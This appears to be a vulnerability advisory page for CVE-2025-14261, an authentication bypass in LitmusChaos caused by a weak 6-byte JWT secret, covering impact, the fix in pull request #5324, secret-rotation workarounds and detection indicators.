CVE-2025-14261
📋 TL;DR
CVE-2025-14261 is an authentication bypass vulnerability in Litmus platform where JWT tokens are signed with an extremely weak 6-byte secret, making them trivial to brute-force. This allows attackers to forge valid authentication tokens and gain unauthorized access to the platform. All Litmus deployments using the default or weak JWT secrets are affected.
💻 Affected Systems
- LitmusChaos
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the Litmus platform allowing attackers to execute arbitrary chaos experiments, modify configurations, access sensitive data, and potentially pivot to underlying Kubernetes clusters.
Likely Case
Attackers forge valid JWT tokens to gain administrative access to Litmus, enabling them to view, modify, or execute chaos experiments without authorization.
If Mitigated
With proper network segmentation and access controls, impact is limited to the Litmus platform itself without lateral movement to other systems.
🎯 Exploit Status
The 6-byte secret can be brute-forced in seconds using standard hardware. Public references demonstrate the exploit methodology.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Fixed in pull request #5324
Vendor Advisory: https://research.jfrog.com/vulnerabilities/litmus-jwt-missing-entropy-elevation-jfsa-2025-001648159/
Restart Required: Yes
Instructions:
1. Update Litmus to the latest version containing PR #5324. 2. Regenerate all JWT secrets. 3. Restart Litmus components. 4. Invalidate existing JWT tokens.
🔧 Temporary Workarounds
Manual JWT Secret Rotation
linuxManually replace the weak JWT secret with a strong 32+ byte secret
kubectl edit secret <litmus-jwt-secret> -n litmus
Replace the jwt-secret value with a strong random base64 string (min 32 bytes)
🧯 If You Can't Patch
- Implement network-level controls to restrict access to Litmus API endpoints
- Deploy a WAF or API gateway with JWT validation and rate limiting
🔍 How to Verify
Check if Vulnerable:
Check if JWT secret length is less than 32 bytes in Litmus configuration or secretsCheck Version:
kubectl get pods -n litmus -o jsonpath='{.items[*].spec.containers[*].image}' | grep litmusVerify Fix Applied:
Verify JWT secret is at least 32 bytes and test that old tokens are rejected📡 Detection & Monitoring
Log Indicators:
- Multiple failed JWT validation attempts followed by successful authentication
- Authentication from unexpected IP addresses
Network Indicators:
- Unusual API request patterns to /auth endpoints
- JWT tokens with suspicious signatures
SIEM Query:
source="litmus" AND (event="authentication" OR event="jwt_validation") AND result="success" | stats count by src_ip